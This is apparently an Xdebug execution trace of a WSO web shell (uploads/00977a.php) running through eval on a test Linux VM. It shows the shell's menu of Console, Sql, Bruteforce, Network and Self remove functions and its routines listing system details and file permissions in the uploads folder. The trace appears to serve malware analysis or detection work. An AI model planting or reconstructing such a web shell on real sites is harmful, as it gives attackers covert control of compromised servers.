4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	492	$opt_charsets .= '<option value="KOI8-U" >KOI8-U</option>'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	492	$opt_charsets .= '<option value="cp866" >cp866</option>'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	495	$m = ['Sec. Info' => 'SecInfo', 'Files' => 'FilesMan', 'Console' => 'Console', 'Sql' => 'Sql', 'Php' => 'Php', 'String tools' => 'StringTools', 'Bruteforce' => 'Bruteforce', 'Network' => 'Network']
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	501	$m['Self remove'] = 'SelfRemove'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	503	$menu = ''
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	505	$k = 'Sec. Info'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	507	$menu .= '<th width="11%">[ <a href="#" onclick="g(\'SecInfo\',null,\'\',\'\',\'\')">Sec. Info</a> ]</th>'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	505	$k = 'Files'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	507	$menu .= '<th width="11%">[ <a href="#" onclick="g(\'FilesMan\',null,\'\',\'\',\'\')">Files</a> ]</th>'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	505	$k = 'Console'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	507	$menu .= '<th width="11%">[ <a href="#" onclick="g(\'Console\',null,\'\',\'\',\'\')">Console</a> ]</th>'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	505	$k = 'Sql'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	507	$menu .= '<th width="11%">[ <a href="#" onclick="g(\'Sql\',null,\'\',\'\',\'\')">Sql</a> ]</th>'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	505	$k = 'Php'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	507	$menu .= '<th width="11%">[ <a href="#" onclick="g(\'Php\',null,\'\',\'\',\'\')">Php</a> ]</th>'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	505	$k = 'String tools'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	507	$menu .= '<th width="11%">[ <a href="#" onclick="g(\'StringTools\',null,\'\',\'\',\'\')">String tools</a> ]</th>'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	505	$k = 'Bruteforce'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	507	$menu .= '<th width="11%">[ <a href="#" onclick="g(\'Bruteforce\',null,\'\',\'\',\'\')">Bruteforce</a> ]</th>'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	505	$k = 'Network'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	507	$menu .= '<th width="11%">[ <a href="#" onclick="g(\'Network\',null,\'\',\'\',\'\')">Network</a> ]</th>'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	505	$k = 'Self remove'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	507	$menu .= '<th width="11%">[ <a href="#" onclick="g(\'SelfRemove\',null,\'\',\'\',\'\')">Self remove</a> ]</th>'
4		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	510	$drives = ''
5	55	0	0.009388	1147672	php_uname	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	524	0
5	55	1	0.009403	1147784
5	55	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
5	56	0	0.009428	1147784	substr	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	524	3	'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'	0	120
5	56	1	0.009446	1147880
5	56	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
5	57	0	0.009465	1147928	phpversion	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	524	0
5	57	1	0.009478	1147992
5	57	R			'7.2.34-37+ubuntu22.04.1+deb.sury.org+1'
5	58	0	0.009495	1148120	date	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	526	1	'Y-m-d H:i:s'
5	58	1	0.009563	1150472
5	58	R			'2023-02-12 21:32:30'
5	59	0	0.009584	1150312	wsoViewSize	1		/var/www/html/uploads/00977a.php(4) : eval()'d code	526	1	232015802368
6	60	0	0.009601	1150312	sprintf	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	644	2	'%1.2f'	216.08155441284
6	60	1	0.009617	1150696
6	60	R			'216.08'
5	59	1	0.009631	1150352
5	59	R			'216.08 GB'
5	61	0	0.009645	1150312	wsoViewSize	1		/var/www/html/uploads/00977a.php(4) : eval()'d code	526	1	198164074496
6	62	0	0.009659	1150312	sprintf	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	644	2	'%1.2f'	184.55467605591
6	62	1	0.009674	1150696
6	62	R			'184.55'
5	61	1	0.009688	1150352
5	61	R			'184.55 GB'
5	63	0	0.009703	1150568	wsoPermsColor	1		/var/www/html/uploads/00977a.php(4) : eval()'d code	526	1	'/var/www/html/uploads/'
6	64	0	0.009718	1150568	is_readable	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	704	1	'/var/www/html/uploads/'
6	64	1	0.009740	1150608
6	64	R			TRUE
6	65	0	0.009754	1150568	is_writable	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	708	1	'/var/www/html/uploads/'
6	65	1	0.009771	1150608
6	65	R			TRUE
6	66	0	0.009784	1150568	fileperms	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	714	1	'/var/www/html/uploads/'
6	66	1	0.009801	1150632
6	66	R			16895
6	67	0	0.009814	1150592	wsoPerms	1		/var/www/html/uploads/00977a.php(4) : eval()'d code	714	1	16895
6		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	671	$i = 'd'
6		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	679	$i .= 'r'
6		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	681	$i .= 'w'
6		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	683	$i .= 'x'
6		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	685	$i .= 'r'
6		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	687	$i .= 'w'
6		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	689	$i .= 'x'
6		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	691	$i .= 'r'
6		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	693	$i .= 'w'
6		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	695	$i .= 'x'
6	67	1	0.009933	1150632
6	67	R			'drwxrwxrwx'
5	63	1	0.009947	1150656
5	63	R			'<font color=#25ff00>drwxrwxrwx</font>'
4	31	1	0.009976	1146704
4	68	0	0.009985	1146704	wsoScandir	1		/var/www/html/uploads/00977a.php(4) : eval()'d code	1234	1	'/var/www/html/uploads/'
5	69	0	0.010000	1146704	function_exists	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	721	1	'scandir'
5	69	1	0.010014	1146744
5	69	R			TRUE
5	70	0	0.010027	1146704	scandir	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	723	1	'/var/www/html/uploads/'
5	70	1	0.010064	1147328
5	70	R			[0 => '.', 1 => '..', 2 => '.htaccess', 3 => '00977a.php', 4 => 'data', 5 => 'prepend.php']
4	68	1	0.010086	1147296
4	68	R			[0 => '.', 1 => '..', 2 => '.htaccess', 3 => '00977a.php', 4 => 'data', 5 => 'prepend.php']
3		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	1234	$dirContent = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => '00977a.php', 4 => 'data', 5 => 'prepend.php']
3		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	1240	$sort = [0 => 'name', 1 => 1]
3		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	1268	$files = []
3		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	1268	$dirs = []
3		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	1270	$n = 6
3		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	1272	$i = 0
4	71	0	0.010190	1147320	fileowner	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1274	1	'.'
4	71	1	0.010206	1147344
4	71	R			0
4	72	0	0.010219	1147304	posix_getpwuid	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1274	1	0
4	72	1	0.010248	1148104
4	72	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	1274	$ow = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	73	0	0.010290	1148072	filegroup	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1276	1	'.'
4	73	1	0.010304	1148112
4	73	R			0
4	74	0	0.010316	1148072	posix_getgrgid	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1276	1	0
4	74	1	0.010340	1148728
4	74	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	1276	$gr = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4	75	0	0.010378	1149168	filemtime	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1282	1	'/var/www/html/uploads/.'
4	75	1	0.010394	1149224
4	75	R			1676255550
4	76	0	0.010408	1149136	date	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1282	2	'Y-m-d H:i:s'	1676255550
4	76	1	0.010440	1149464
4	76	R			'2023-02-12 21:32:30'
4	77	0	0.010455	1149440	wsoPermsColor	1		/var/www/html/uploads/00977a.php(4) : eval()'d code	1284	1	'/var/www/html/uploads/.'
5	78	0	0.010469	1149440	is_readable	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	704	1	'/var/www/html/uploads/.'
5	78	1	0.010486	1149480
5	78	R			TRUE
5	79	0	0.010499	1149440	is_writable	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	708	1	'/var/www/html/uploads/.'
5	79	1	0.010515	1149480
5	79	R			TRUE
5	80	0	0.010528	1149440	fileperms	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	714	1	'/var/www/html/uploads/.'
5	80	1	0.010541	1149480
5	80	R			16895
5	81	0	0.010554	1149440	wsoPerms	1		/var/www/html/uploads/00977a.php(4) : eval()'d code	714	1	16895
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	671	$i = 'd'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	679	$i .= 'r'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	681	$i .= 'w'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	683	$i .= 'x'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	685	$i .= 'r'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	687	$i .= 'w'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	689	$i .= 'x'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	691	$i .= 'r'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	693	$i .= 'w'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	695	$i .= 'x'
5	81	1	0.010674	1149480
5	81	R			'drwxrwxrwx'
4	77	1	0.010688	1149504
4	77	R			'<font color=#25ff00>drwxrwxrwx</font>'
4	82	0	0.010705	1149504	filesize	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1286	1	'/var/www/html/uploads/.'
4	82	1	0.010719	1149544
4	82	R			4096
3		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	1290	$tmp = ['name' => '.', 'path' => '/var/www/html/uploads/.', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root']
4	83	0	0.010756	1149504	is_file	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1294	1	'/var/www/html/uploads/.'
4	83	1	0.010770	1149544
4	83	R			FALSE
4	84	0	0.010784	1149504	is_link	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1298	1	'/var/www/html/uploads/.'
4	84	1	0.010800	1149568
4	84	R			FALSE
4	85	0	0.010814	1149528	is_dir	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1302	1	'/var/www/html/uploads/.'
4	85	1	0.010827	1149568
4	85	R			TRUE
4	86	0	0.010841	1149480	array_merge	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1304	2	['name' => '.', 'path' => '/var/www/html/uploads/.', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root']	['type' => 'dir']
4	86	1	0.010867	1149920
4	86	R			['name' => '.', 'path' => '/var/www/html/uploads/.', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']
3		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	1304	$dirs[] = ['name' => '.', 'path' => '/var/www/html/uploads/.', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']
3		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	1272	$i++
4	87	0	0.010932	1150232	fileowner	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1274	1	'..'
4	87	1	0.010948	1150256
4	87	R			0
4	88	0	0.010960	1150216	posix_getpwuid	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1274	1	0
4	88	1	0.010985	1151016
4	88	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	1274	$ow = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	89	0	0.011027	1150248	filegroup	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1276	1	'..'
4	89	1	0.011041	1150288
4	89	R			0
4	90	0	0.011053	1150248	posix_getgrgid	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1276	1	0
4	90	1	0.011076	1150904
4	90	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	1276	$gr = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4	91	0	0.011113	1150768	filemtime	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1282	1	'/var/www/html/uploads/..'
4	91	1	0.011130	1150832
4	91	R			1676255550
4	92	0	0.011143	1150736	date	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1282	2	'Y-m-d H:i:s'	1676255550
4	92	1	0.011182	1151064
4	92	R			'2023-02-12 21:32:30'
4	93	0	0.011198	1151048	wsoPermsColor	1		/var/www/html/uploads/00977a.php(4) : eval()'d code	1284	1	'/var/www/html/uploads/..'
5	94	0	0.011212	1151048	is_readable	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	704	1	'/var/www/html/uploads/..'
5	94	1	0.011228	1151088
5	94	R			TRUE
5	95	0	0.011241	1151048	is_writable	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	708	1	'/var/www/html/uploads/..'
5	95	1	0.011257	1151088
5	95	R			TRUE
5	96	0	0.011270	1151048	fileperms	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	714	1	'/var/www/html/uploads/..'
5	96	1	0.011283	1151088
5	96	R			16895
5	97	0	0.011296	1151048	wsoPerms	1		/var/www/html/uploads/00977a.php(4) : eval()'d code	714	1	16895
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	671	$i = 'd'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	679	$i .= 'r'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	681	$i .= 'w'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	683	$i .= 'x'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	685	$i .= 'r'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	687	$i .= 'w'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	689	$i .= 'x'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	691	$i .= 'r'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	693	$i .= 'w'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	695	$i .= 'x'
5	97	1	0.011415	1151088
5	97	R			'drwxrwxrwx'
4	93	1	0.011429	1151112
4	93	R			'<font color=#25ff00>drwxrwxrwx</font>'
4	98	0	0.011445	1151112	filesize	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1286	1	'/var/www/html/uploads/..'
4	98	1	0.011459	1151152
4	98	R			4096
3		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	1290	$tmp = ['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root']
4	99	0	0.011496	1150736	is_file	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1294	1	'/var/www/html/uploads/..'
4	99	1	0.011509	1150776
4	99	R			FALSE
4	100	0	0.011523	1150736	is_link	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1298	1	'/var/www/html/uploads/..'
4	100	1	0.011539	1150784
4	100	R			FALSE
4	101	0	0.011553	1150744	is_dir	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1302	1	'/var/www/html/uploads/..'
4	101	1	0.011567	1150784
4	101	R			TRUE
4	102	0	0.011580	1150688	array_merge	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1304	2	['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root']	['type' => 'dir']
4	102	1	0.011609	1151128
4	102	R			['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']
3		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	1304	$dirs[] = ['name' => '..', 'path' => '/var/www/html/uploads/..', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=#25ff00>drwxrwxrwx</font>', 'size' => 4096, 'owner' => 'root', 'group' => 'root', 'type' => 'dir']
3		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	1272	$i++
4	103	0	0.011668	1151064	fileowner	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1274	1	'.htaccess'
4	103	1	0.011684	1151088
4	103	R			0
4	104	0	0.011697	1151048	posix_getpwuid	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1274	1	0
4	104	1	0.011721	1151848
4	104	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	1274	$ow = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	105	0	0.011763	1151080	filegroup	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1276	1	'.htaccess'
4	105	1	0.011777	1151120
4	105	R			0
4	106	0	0.011789	1151080	posix_getgrgid	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1276	1	0
4	106	1	0.011812	1151736
4	106	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	1276	$gr = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
4	107	0	0.011849	1151600	filemtime	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1282	1	'/var/www/html/uploads/.htaccess'
4	107	1	0.011866	1151656
4	107	R			1676255550
4	108	0	0.011880	1151560	date	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1282	2	'Y-m-d H:i:s'	1676255550
4	108	1	0.011912	1151888
4	108	R			'2023-02-12 21:32:30'
4	109	0	0.011926	1151872	wsoPermsColor	1		/var/www/html/uploads/00977a.php(4) : eval()'d code	1284	1	'/var/www/html/uploads/.htaccess'
5	110	0	0.011940	1151872	is_readable	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	704	1	'/var/www/html/uploads/.htaccess'
5	110	1	0.011957	1151912
5	110	R			TRUE
5	111	0	0.011970	1151872	is_writable	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	708	1	'/var/www/html/uploads/.htaccess'
5	111	1	0.011987	1151912
5	111	R			FALSE
5	112	0	0.012001	1151872	fileperms	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	710	1	'/var/www/html/uploads/.htaccess'
5	112	1	0.012015	1151912
5	112	R			33188
5	113	0	0.012027	1151872	wsoPerms	1		/var/www/html/uploads/00977a.php(4) : eval()'d code	710	1	33188
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	667	$i = '-'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	679	$i .= 'r'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	681	$i .= 'w'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	683	$i .= '-'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	685	$i .= 'r'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	687	$i .= '-'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	689	$i .= '-'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	691	$i .= 'r'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	693	$i .= '-'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	695	$i .= '-'
5	113	1	0.012147	1151912
5	113	R			'-rw-r--r--'
4	109	1	0.012162	1151936
4	109	R			'<font color=white>-rw-r--r--</font>'
4	114	0	0.012178	1151936	filesize	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1286	1	'/var/www/html/uploads/.htaccess'
4	114	1	0.012192	1151976
4	114	R			64
3		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	1290	$tmp = ['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=white>-rw-r--r--</font>', 'size' => 64, 'owner' => 'root', 'group' => 'root']
4	115	0	0.012229	1151560	is_file	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1294	1	'/var/www/html/uploads/.htaccess'
4	115	1	0.012243	1151600
4	115	R			TRUE
4	116	0	0.012261	1151504	array_merge	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1296	2	['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=white>-rw-r--r--</font>', 'size' => 64, 'owner' => 'root', 'group' => 'root']	['type' => 'file']
4	116	1	0.012285	1151944
4	116	R			['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=white>-rw-r--r--</font>', 'size' => 64, 'owner' => 'root', 'group' => 'root', 'type' => 'file']
3		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	1296	$files[] = ['name' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=white>-rw-r--r--</font>', 'size' => 64, 'owner' => 'root', 'group' => 'root', 'type' => 'file']
3		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	1272	$i++
4	117	0	0.012344	1152256	fileowner	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1274	1	'00977a.php'
4	117	1	0.012361	1152280
4	117	R			1000
4	118	0	0.012374	1152240	posix_getpwuid	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1274	1	1000
4	118	1	0.012407	1153056
4	118	R			['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
3		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	1274	$ow = ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
4	119	0	0.012452	1152288	filegroup	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1276	1	'00977a.php'
4	119	1	0.012466	1152328
4	119	R			1000
4	120	0	0.012479	1152288	posix_getgrgid	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1276	1	1000
4	120	1	0.012511	1152944
4	120	R			['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
3		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	1276	$gr = ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
4	121	0	0.012549	1152824	filemtime	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1282	1	'/var/www/html/uploads/00977a.php'
4	121	1	0.012566	1152888
4	121	R			1676255550
4	122	0	0.012580	1152784	date	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1282	2	'Y-m-d H:i:s'	1676255550
4	122	1	0.012612	1153112
4	122	R			'2023-02-12 21:32:30'
4	123	0	0.012626	1153104	wsoPermsColor	1		/var/www/html/uploads/00977a.php(4) : eval()'d code	1284	1	'/var/www/html/uploads/00977a.php'
5	124	0	0.012641	1153104	is_readable	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	704	1	'/var/www/html/uploads/00977a.php'
5	124	1	0.012657	1153144
5	124	R			TRUE
5	125	0	0.012674	1153104	is_writable	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	708	1	'/var/www/html/uploads/00977a.php'
5	125	1	0.012691	1153144
5	125	R			FALSE
5	126	0	0.012704	1153104	fileperms	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	710	1	'/var/www/html/uploads/00977a.php'
5	126	1	0.012718	1153144
5	126	R			33204
5	127	0	0.012731	1153104	wsoPerms	1		/var/www/html/uploads/00977a.php(4) : eval()'d code	710	1	33204
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	667	$i = '-'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	679	$i .= 'r'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	681	$i .= 'w'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	683	$i .= '-'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	685	$i .= 'r'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	687	$i .= 'w'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	689	$i .= '-'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	691	$i .= 'r'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	693	$i .= '-'
5		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	695	$i .= '-'
5	127	1	0.012850	1153144
5	127	R			'-rw-rw-r--'
4	123	1	0.012865	1153168
4	123	R			'<font color=white>-rw-rw-r--</font>'
4	128	0	0.012881	1153168	filesize	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1286	1	'/var/www/html/uploads/00977a.php'
4	128	1	0.012896	1153208
4	128	R			111063
3		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	1290	$tmp = ['name' => '00977a.php', 'path' => '/var/www/html/uploads/00977a.php', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=white>-rw-rw-r--</font>', 'size' => 111063, 'owner' => 'osboxes', 'group' => 'osboxes']
4	129	0	0.012933	1152792	is_file	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1294	1	'/var/www/html/uploads/00977a.php'
4	129	1	0.012953	1152832
4	129	R			TRUE
4	130	0	0.012967	1152728	array_merge	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1296	2	['name' => '00977a.php', 'path' => '/var/www/html/uploads/00977a.php', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=white>-rw-rw-r--</font>', 'size' => 111063, 'owner' => 'osboxes', 'group' => 'osboxes']	['type' => 'file']
4	130	1	0.013014	1153168
4	130	R			['name' => '00977a.php', 'path' => '/var/www/html/uploads/00977a.php', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=white>-rw-rw-r--</font>', 'size' => 111063, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file']
3		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	1296	$files[] = ['name' => '00977a.php', 'path' => '/var/www/html/uploads/00977a.php', 'modify' => '2023-02-12 21:32:30', 'perms' => '<font color=white>-rw-rw-r--</font>', 'size' => 111063, 'owner' => 'osboxes', 'group' => 'osboxes', 'type' => 'file']
3		A						/var/www/html/uploads/00977a.php(4) : eval()'d code	1272	$i++
4	131	0	0.013074	1153104	fileowner	0		/var/www/html/uploads/00977a.php(4) : eval()'d code	1274	1	'data'
